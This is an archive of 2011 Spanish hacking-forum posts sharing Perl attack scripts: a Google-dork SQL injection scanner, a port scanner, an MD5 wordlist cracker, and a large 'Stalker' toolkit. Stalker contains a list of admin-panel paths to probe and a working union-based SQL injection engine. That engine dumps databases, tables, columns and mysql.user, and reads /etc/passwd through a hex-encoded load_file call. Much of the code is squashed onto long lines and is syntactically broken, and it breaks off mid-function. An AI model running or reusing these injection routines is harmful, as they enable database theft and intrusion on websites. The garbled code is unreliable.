Programación / Scripting / [Perl] Search in google for scan SQLI
en: 7 Octubre 2011, 15:57 pm
Un simple scanner de SQLI para usar en google
#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011
#
# Review notes (a defender's reading of this 2011 forum paste):
# - Flow: read a dork and a page count from stdin, collect Google result
#   links, then send one probe request per link that contains "=".
# - As posted the script is inert: google() never fills @url/@founds (both
#   inner if-bodies are empty and there is no return statement), get_links()
#   returns nothing, and sql() builds its request from $page, which is never
#   assigned.
# - No `use strict`/`use warnings`; $code, $code1, $page, $test, @url,
#   @founds, @limpio and %repe are all undeclared package globals.
use LWP::UserAgent;
use HTML::LinkExtor;

# One shared agent with a fixed, dated User-Agent string and a 5 s timeout.
# The literal UA string is the most reliable log signature of this tool.
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
chomp(my $dork = <stdin>);   # search query
chomp(my $pages = <stdin>);  # upper bound for the "start=" result offset
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
# Greedy (.*) keeps everything up to the LAST "=" of the URL, then "=" is re-appended.
for my $link(@links) {
    if ($link=~/(.*)=/ig) {
        my $web = $1;
        sql($web."=");
    }
}
print "\n\n[+] Finish\n";
copyright();
<stdin>;   # wait for Enter before the window closes

# google($dork, $max_start): walk Google result pages in steps of 10.
# NOTE(review): `my($a,$b)` shadows sort's package variables; both inner
# if-blocks are empty and nothing is returned, so callers get an empty list.
sub google {
    my($a,$b) = @_;
    for ($pages=10;$pages<=$b;$pages=$pages+10) {
        $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
        my @links = get_links($code);
        for my $l(@links) {
            if ($l =~/webcache.googleusercontent.com/) {
            }
        }
    }
    for(@url) {
        if ($_ =~/cache:(.*?):(.*?)\+/) {
        }
    }
    my @founds = repes(@founds);
}

# sql($url): one error-based probe; the fixed query suffix and the MySQL
# error text it looks for are the observable signatures in server logs.
# NOTE(review): the argument is ignored; $page is never set anywhere.
sub sql {
    my ($pass1,$pass2) = ("+","--");
    $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
    if ($code1=~/The used SELECT statements have a different number of columns/ig) {
        print "[+] SQLI : $page\a\n";
    }
}

# get_links($html): parses with HTML::LinkExtor, but the callback discards
# every link and the sub has no return, so nothing comes back.
sub get_links {
    $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
    sub agarrar {
        my ($a,%b) = @_;
    }
}

# repes(@list): de-duplicates into the package globals @limpio/%repe;
# there is no return statement, so the caller receives nothing useful.
sub repes {
    foreach $test(@_) {
        push @limpio,$test unless $repe{$test}++;
    }
}

sub head { print "\n\n-- == Search Google == --\n\n"; }
sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; }

# GET / POST wrappers over the shared agent; tomar() is unused in this script.
sub toma { return $nave->get($_[0])->content; }
sub tomar {
    my ($web,$var) = @_;
    return $nave->post($web,[%{$var}])->content;
}
#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?
Programación / Scripting / [Perl] Scan Port By Doddy H
en: 7 Octubre 2011, 15:56 pm
HOla a todos aca les traigo un simple scanner de puertos hecho en perl
#!usr/bin/perl
#Scan Port
#(C) Doddy Hackman 2011
#Creditos
#
# Review notes: TCP connect() check of six fixed ports, one connection each,
# 0.5 s timeout. No `use strict`/`use warnings`; `new IO::Socket::INET(...)`
# is indirect-object syntax (IO::Socket::INET->new(...) is the safe form).
use IO::Socket;

head();
# Usage check: an argument of "" or "0" counts as missing.
unless($ARGV[0]) {
    print "\n\n[sintax] : ".$0." <ip> \n\n";
}
else {
    scan($ARGV[0]);
}
copyright();

# scan($host): report a port as open when a TCP connection succeeds.
# Ports are iterated in hash order, so output order varies between runs.
sub scan {
    my %ports = ("21"=>"ftp",
                 "22"=>"ssh",
                 "25"=>"smtp",
                 "80"=>"http",
                 "110"=>"pop3",
                 "3306"=>"mysql"
                 );
    print "\n[+] Scanning $_[0]\n\n\n";
    for my $port(keys %ports) {
        # The socket object is only tested for truth and is not kept.
        if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) {
            print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
        }
    }
}

sub head { print "\n\n-- == Scan Port == --\n\n"; }
sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; }
Ejemplo de uso
Programación / Scripting / [Perl] Search MD5
en: 7 Octubre 2011, 15:56 pm
Hola a todos HOy acabo de hacer un crackeador de hash md5 con salto o sin el En esta version es con ventanas usandos tk
#Search MD5
#Version : Tk
#Author : Doddy Hackman
#
# Review notes: Tk front-end that MD5-hashes each line of a local wordlist
# (optionally with a salt appended) and compares it with the hash typed in.
# The paste is not runnable as-is:
# - no `use strict`/`use warnings`; $file, $browse, @words, $digest and $ok
#   are undeclared globals;
# - crack() reads the bareword handle `word`, which is never opened here
#   (an `open` line seems to be missing, which would also balance the stray
#   `}` in front of `else`);
# - `Digest::MD5->md5_hex(...)` calls a plain function as a class method,
#   so the string "Digest::MD5" is prepended to the data being hashed;
# - `$digest == $hash` compares two hex strings numerically (should be `eq`).
use Tk;
use Digest::MD5;
use Tk::FileSelect;
use Tk::ROText;

# `use` happens at compile time, so Win32::Console is loaded on every OS;
# only the Free() call is conditional.
if ($^O eq 'MSWin32') {
    use Win32::Console;
    Win32::Console::Free();
}

# Main window: hash, salt and wordlist entries plus the action buttons.
my $w = MainWindow->new(-background=>"black");
$w->title("Search MD5");
$w->geometry("500x200+20+20");
$w->resizable(0,0);
$w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack();
$w->Label(-text =>"Hash",-background =>"black",-foreground =>"green")->place(-x =>40, -y => 55);
# The entries are kept through the return value of place() (the widget itself).
my $hash = $w->Entry(-text =>"30d554c3665c8f204622b2003c77d994",-background =>"black",-foreground =>"green")->place(-x =>90, -y => 55);
$w->Label(-text =>"Salt",-background =>"black",-foreground =>"green")->place(-x =>260, -y => 55);
# "X" is the sentinel for "no salt" (see crack()).
my $salt = $w->Entry(-text =>"X",-background =>"black",-foreground =>"green")->place(-x =>290, -y => 55);
$w->Label(-text =>"Wordlist",-background =>"black",-foreground =>"green")->place(-x =>40, -y => 100);
my $o = $w->Entry(-textvariable =>\$file,-background =>"black",-foreground =>"green")->place(-x =>90, -y => 100);
$w->Button(-text =>"Browse",-background =>"black",-foreground =>"red",-activebackground =>"red",-command =>\&oper)->place(-x =>230, -y => 100);
$w->Button(-text =>"Crack!",-foreground =>"green",-background =>"black",-command =>\&crack,-activebackground =>"green")->place(-x =>180, -y => 160);
$w->Button(-text =>"About",-foreground =>"green",-background =>"black",-command =>\&about,-activebackground =>"green")->place(-x =>240, -y => 160);
$w->Button(-text =>"Exit",-foreground =>"green",-background =>"black",-command =>[$w =>'destroy'],-activebackground =>"green")->place(-x =>300, -y => 160);

# oper(): file chooser for the wordlist; writes the chosen path into the entry.
sub oper{
    $w->update;
    $browse = $w->FileSelect(-directory => "/");
    my $file = $browse->Show;
    $o->configure (-text =>$file);
}

# about(): secondary window with author/contact text.
sub about {
    my $venta = MainWindow->new(-background=>"black");
    $venta->geometry("300x180+20+20");
    $venta->title("About");
    $venta->resizable(0,0);
    $venta->Label(-text=>"\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n",-background=>"black",-foreground=>"yellow")->pack();
    $venta->Button(-text=>"Exit",-foreground=>"yellow",-background=>"black",-command => [$venta => 'destroy'],-activebackground=>'yellow')->pack()
}

# crack(): button callback; opens a "Status" window and walks the wordlist.
# NOTE(review): `next` is used as an early return, but there is no enclosing
# loop, so at runtime it is an error rather than a return.
sub crack {
    my $hash = $hash->get;
    my $salt = $salt->get;
    my $wordlist = $o->get;
    my $console = MainWindow->new(-background=>"black");
    $console->title("Status");
    $console->resizable(0,0);
    $console->geometry("400x320+20+20");
    $console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack();
    my $box = $console->ROText(-background =>"black",-foreground =>"green",-width => 45,-height => 15)->place(-x =>40,-y=>50);
    $console->Button(-text =>"Exit",-background =>"black",-foreground =>"green",-activebackground =>"green",-command => [$console => 'destroy'],-width =>"20")->place(-x =>130, -y => 280);
    if ($salt eq "X") { $salt = "";}
    unless (-f $wordlist) { $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");next;}
    $box->insert('end',"[Hash] : $hash\n[Salt] : $salt\n[Wordlist] : $wordlist\n\n");
    # Bareword handle `word` is never opened in this paste.
    @words = <word>;
    for my $pass(@words) {
        $console->update;
        $box->insert('end',"[+] Trying with $pass\n");
        # $pass keeps its trailing newline (only $digest is chomped), so the
        # data hashed is "word\n" . $salt.
        $digest = Digest::MD5->md5_hex($pass.$salt);chomp $digest;
        # Numeric == on two hex strings; should be `eq`.
        if ($digest == $hash) {print "\a\a";$box->insert('end',"\n[Hash encoded] : $hash\n[Hash decoded] : $pass\n\n");$ok="1";last ;}
    }}
    else { $box->insert('end',"\n\n[-] The hash is incorrect\n\n");next;}
    unless ($ok eq "1") {$box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n");next;}
}
MainLoop;
Programación / Scripting / [Perl] Stalker By Doddy H
en: 7 Octubre 2011, 15:56 pm
Bueno, acá les traigo un programa que he estado haciendo esta última semana. Se llama Stalker; sirve como consola en caso de que cmd.exe no esté disponible y tiene las siguientes funciones: - Mostrar IP de servidor específico
- Capturar todos los links de una pagina
- Recibir procesos de nuestra maquina
- Cerrar el proceso que nos moleste
- Conectar a un servidor y mostrar respuesta
- Capturar metodos HTTP de un servidor web
- Verificar listado de directorios en una pagina
- Codificación y decodificación de hex/ascii/base64
- Escanear puertos de una IP
- Buscar panel de administración
- Crackear hash md5 mediante webs
- Buscar en google paginas vulnerables a SQLI
- Cliente FTP
- Navegador por nuestros archivos y directorios
- Y ejecutar comandos
#!usr/bin/perl #Project STALKER (C) Doddy Hackman 2011 # #ppm install http://www.bribes.org/perl/ppm/DBI.ppd #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd # #You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm # use IO::Socket; use HTML::LinkExtor; use LWP::UserAgent; use Win32::Process; use Net::FTP; use Cwd; use URI ::Split qw(uri_split ); use MIME::Base64; use DBI; use Color::Output; Color::Output::Init @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx' ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx' ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx' ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx' ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx' ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx' ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp' ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx' ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php' ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php' ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php' ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php' ,'administration/','administration/index.php','administration/login.php' ,'administrator/index.php','administrator/login.php','administrator/system.php','system/' ,'system/login.php','admin.php','login.php','administrador.php','administration.php' ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php' ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html' 
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html' ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html' ,'administrator/','administrator/index.html','administrator/login.html' ,'administrator/account.html','administrator/account.php','administrator.html','login.html' ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php' ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/' ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html' ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp' ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp' ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp' ,'administrator/login.asp','administrator/account.asp','administrator.asp' ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp' ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/' ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php' ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp' ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html' ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html' ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp' ,'webadmin.html','administratie/','admins/','admins.php','admins.asp' ,'admins.html','administrivia/','Database_Administration/','WebAdmin/' ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/' ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/' ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/' ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/ ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/ 
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/ ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/ ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/' ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/' ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/' ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/' ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/' ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/' ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/' ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/' ,'server/','database_administration/','power_user/','system_administration/' ,'ss_vms_admin_sm/'); unless (-d "/logs/webs") { } my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); getinfo(); $SIG{INT} = \&next; while(1) { cprint "\x037"; #13 menujo(); cprint "\x030"; } sub getinfo { $so = $^O; $login = Win32::LoginName(); $domain = Win32::DomainName(); cprint "\x0313"; #13 print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n"; cprint "\x030"; } sub menujo { chomp (my $cmd = <stdin>); if ($cmd=~/getinfo/ig) { getinfo(); } elsif ($cmd =~/getip (.*)/) { my $te = $1; if ($te eq "" or $te eq " ") { print "\n[+] sintax : getip <host>\n"; } print "\n[IP] : ".getip ($1)."\n"; } elsif ($cmd =~/getlink (.*)/) { print "[+] Extracting links in the page\n\n\n"; $code = toma($1); my @re = get_links($code); for my $url(@re) { } print "\n\n[+] Finish\n"; } elsif ($cmd=~/help/) { helpme(); } elsif ($cmd=~/getprocess/) { my %re = getprocess(); ($proceso,$pid) = ($t=~/(.*):(.*)/ig); print "[+] Proceso : ".$data."\n"; print "[+] PID : ".$re{$data}."\n\n"; } } elsif 
($cmd=~/killprocess (.*) (.*)/) { if (killprocess($1,$2)) { print "[+] Process $1 closed"; } } elsif ($cmd=~/conec (.*) (.*) (.*)/) { print conectar ($1,$2,$3); } elsif ($cmd=~/allow (.*)/) { $re = conectar($1,"80","GET / HTTP/1.0\r\n"); if ($re=~/Allow:(.*)/ig) { print "[+] Metodos : ".$1."\n"; }} elsif ($cmd=~/paths (.*)/) { scanpaths($1); } elsif ($cmd=~/encodehex (.*)/) { print "\n\n[+] ".hex_en ($1)."\n\n"; } elsif ($cmd=~/decodehex (.*)/) { print "\n\n[+] ".hex_de ($1)."\n\n"; } elsif ($cmd=~/download (.*) (.*)/) { my $file,$name = $1,$2; if (download($1,$2)) { print "[+] File downloaded\n"; } } elsif ($cmd=~/encodeascii (.*)/) { print "\n\n[+] ".ascii ($1)."\n\n"; } elsif ($cmd=~/decodeascii (.*)/) { print "\n\n[+] ".ascii_de ($1)."\n\n"; } elsif ($cmd=~/encodebase (.*)/) { print "\n\n[+] ".base ($1)."\n\n"; } elsif ($cmd=~/decodebase (.*)/) { print "\n\n[+] ".base_de ($1)."\n\n"; } elsif ($cmd=~/aboutme/) { aboutme(); } elsif ($cmd=~/scanport (.*)/) { scanport($1); } elsif ($cmd=~/panel (.*)/) { scanpanel($1); } elsif ($cmd=~/scangoogle/) { chomp(my $dork = <stdin>); chomp(my $pages = <stdin>); print "\n\n[Starting the search]\n\n"; my @links = google($dork,$pages); print "\n[Links Found] : ".int(@links)."\n\n\n"; print "[Starting the scan]\n\n\n"; for my $link(@links) { if ($link=~/(.*)=/ig) { my $web = $1; sql($web."="); }} print "\n\n[+] Finish\n"; } elsif ($cmd=~/getpass (.*)/) { crackit($1); } elsif ($cmd=~/ftp (.*) (.*) (.*)/) { ftp($1,$2,$3); } elsif ($cmd=~/navegator/) { nave: chomp(my $rta = <stdin>); if ($rta=~/list/) { my @files = coleccionar(getcwd()); for(@files) { if (-f $_) { print "[File] : ".$_."\n"; } else { print "[Directory] : ".$_."\n"; }}} if ($rta=~/cd (.*)/) { my $dir = $1; print "\n[+] Directory changed\n"; } else { }} if ($rta=~/del (.*)/) { my $file = getcwd()."/".$1; if (-f $file) { print "\n[+] File Deleted\n"; } else { } } else { print "\n[+] Directory Deleted\n"; } else { }}} if ($rta=~/rename (.*) (.*)/) { if (rename(getcwd 
()."/".$1,getcwd ()."/".$2)) { print "\n[+] File Changed\n"; } else { }} my $file = $1; #system(getcwd()."/".$file); } if ($rta=~/help/) { print "\nCommands : help cd list del rename open exit\n\n"; } next; } } elsif ($cmd=~/kobra (.*)/) { my $url = $1; scansqli($url,"--"); } elsif ($cmd=~/mysql (.*) (.*) (.*)/) { enter($1,$2,$3); } copyright(); <stdin>; } else { } #print "\n\n"; } sub scansqli { print "[Status] : Scanning.....\n"; $pass = &bypass($_[1]); my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; if ($_[0]=~/hackman/ig) { savefile($save.".txt","\n[Target Confirmed] : $_[0]\n"); &menu_options($_[0],$pass,$save); } my ($gen,$save,$control) = &length($_[0],$_[1]); if ($control eq 1) { print "[Status] : Enjoy the menu\n\n"; &menu_options($gen,$pass,$save); } else { print "[Status] : Length columns not found\n\n"; menujo(); } } my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2; $code = toma($inyection); if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) { my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2); my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2); unless ($testar1 eq $testar2) { my $patha = $1; $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..200) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test 
= toma($injection); if ($test=~/RATSXPDOWN/) { @number = $test =~m{RATSXPDOWN (\d+)RATSXPDOWN }g ; $control = 1; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; savefile($save.".txt","\n[Target confirmed] : $page"); savefile($save.".txt","[Bypass] : $_[1]\n"); savefile($save.".txt","[Limit] : The site has $rows columns"); savefile($save.".txt","[Data] : The number @number print data"); if ($patha) { savefile($save.".txt","[Full Path Discloure] : $patha"); } $total=~s/$number[0]/hackman /; savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total); return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control); }}}}} sub details { my ($page,$bypass,$save) = @_; ($pass1,$pass2) = &bypass($bypass); savefile($save.".txt","\n"); if ($page=~/(.*)hackman(.*)/ig) { print "\n\n[+] Searching information..\n\n"; my ($start,$end) = ($1,$2); $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2; $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2; $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ($test2=~/ERTOR854/ig) { savefile($save.".txt","[mysql.user] : ON"); print "[mysql.user] : ON\n"; } else { print "[mysql.user] : OFF\n"; savefile($save.".txt","[mysql.user] : OFF"); } if ($test1=~/ERTOR854/ig) { print "[information_schema.tables] : ON\n"; savefile($save.".txt","[information_schema.tables] : ON"); } else { print "[information_schema.tables] : OFF\n"; savefile($save.".txt","[information_schema.tables] : OFF"); } if ($test3=~/ERTOR854/ig) { print "[+] load_file permite ver los archivos\n"; savefile($save.".txt","[load_file] : 
".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass2; $code = toma($injection); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n"; savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"); } else { print "\n[-] Not found any data\n"; }}} sub menu_options { my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; print "\n/logs/webs/$save>"; chomp (my $rta = <stdin>); if ($rta=~/help/) { commands : details tables columns dbs othertable othercolumn mysqluser dumper logs exit ); } if ($rta =~/tables/) { schematables($_[0],$_[1],$save); &reload; } elsif ($rta =~/columns (.*)/) { my $tabla = $1; schemacolumns($_[0],$_[1],$save,$tabla); &reload; } elsif ($rta =~/dbs/) { &schemadb($_[0],$_[1],$save); &reload; } elsif ($rta =~/othertable (.*)/) { my $data = $1; &schematablesdb($_[0],$_[1],$data,$save); &reload; } elsif ($rta =~/othercolumn (.*) (.*)/){ my ($db,$table) = ($1,$2); &schemacolumnsdb($_[0],$_[1],$db,$table,$save); &reload; } elsif ($rta =~/mysqluser/) { &mysqluser($_[0],$_[1],$save); &reload; } elsif ($rta=~/logs/) { $t = "logs/webs/$save.txt"; &reload; } next; } elsif ($rta=~/dumper (.*) (.*) (.*)/) { my ($tabla,$col1,$col2) = ($1,$2,$3); &dump($_[0],$col1,$col2,$tabla,$_[1],$save); &reload; } elsif ($rta =~/details/) { &details($_[0],$_[1],$save); &reload; } else { &reload; } } sub schematables { $real = "1"; my ($page,$bypass,$save) = @_; savefile($save.".txt","\n"); my $page1 = $page; ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","[DB] : default"); print "\n[+] Searching tables with schema\n\n"; $page =~s/hackman /unhex (hex(concat (char 
(82,65,84,83,88,80,68,79,87,78,49),table_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $resto = $1; $total = $resto - 17; print "[+] Tables Length : $total\n\n"; savefile($save.".txt","[+] Searching tables with schema\n"); savefile($save.".txt","[+] Tables Length : $total\n"); my $limit = $1; for my $limit(17..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; print "[Table $real Found : $table ]\n"; savefile($save.".txt","[Table $real Found : $table ]"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; } } sub reload { &menu_options($_[0]); } sub schemacolumns { my ($page,$bypass,$save,$table) = @_; my $page3 = $page; my $page4 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); print "\n[DB] : default\n"; savefile($save.".txt","[DB] : default"); savefile($save.".txt","[Table] : $table\n"); $page3=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns Length : $1 ]\n\n"; savefile($save.".txt","[Columns Length : $1 ]\n"); my $si = $1; $page4=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),column_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = 
toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemadb { my ($page,$bypass,$save) = @_; my $page1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Searching DBS\n\n"; ($pass1,$pass2) = &bypass($bypass); $page=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page.$pass1."from".$pass1."information_schema.schemata"); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $limita = $1; print "[+] Databases Length : $limita\n\n"; savefile($save.".txt","[+] Databases Length : $limita\n"); $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),schema_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit(0..$limita) { $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $control = $1; if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") { print "[Database $real Found] $control\n"; savefile($save.".txt","[Database $real Found] : $control"); $real++; } } } } else { print "[-] information_schema = ERROR\n"; } } sub schematablesdb { my $page = $_[0]; my $db = $_[2]; my $page1 = $page; savefile($_[3].".txt","\n"); print "\n\n[+] Searching tables with DB $db\n\n"; ($pass1,$pass2) = &bypass($_[1]); savefile($_[3].".txt","[DB] : $db"); $page =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),table_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char 
(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n"; if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[+] Tables Length : $1\n\n"; savefile($_[3].".txt","[+] Tables Length : $1\n"); my $limit = $1; $real = "1"; for my $lim(0..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n"; if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; savefile($_[3].".txt","[Table $real Found : $table ]"); print "[Table $real Found : $table ]\n"; $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemacolumnsdb { my ($page,$bypass,$db,$table,$save) = @_; my $page3 = $page; my $page4 = $page; print "\n\n[+] Searching columns in table $table with DB $db\n\n"; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","\n[DB] : $db"); savefile($save.".txt","[Table] : $table"); $page3=~s/hackman /unhex (hex(concat (char 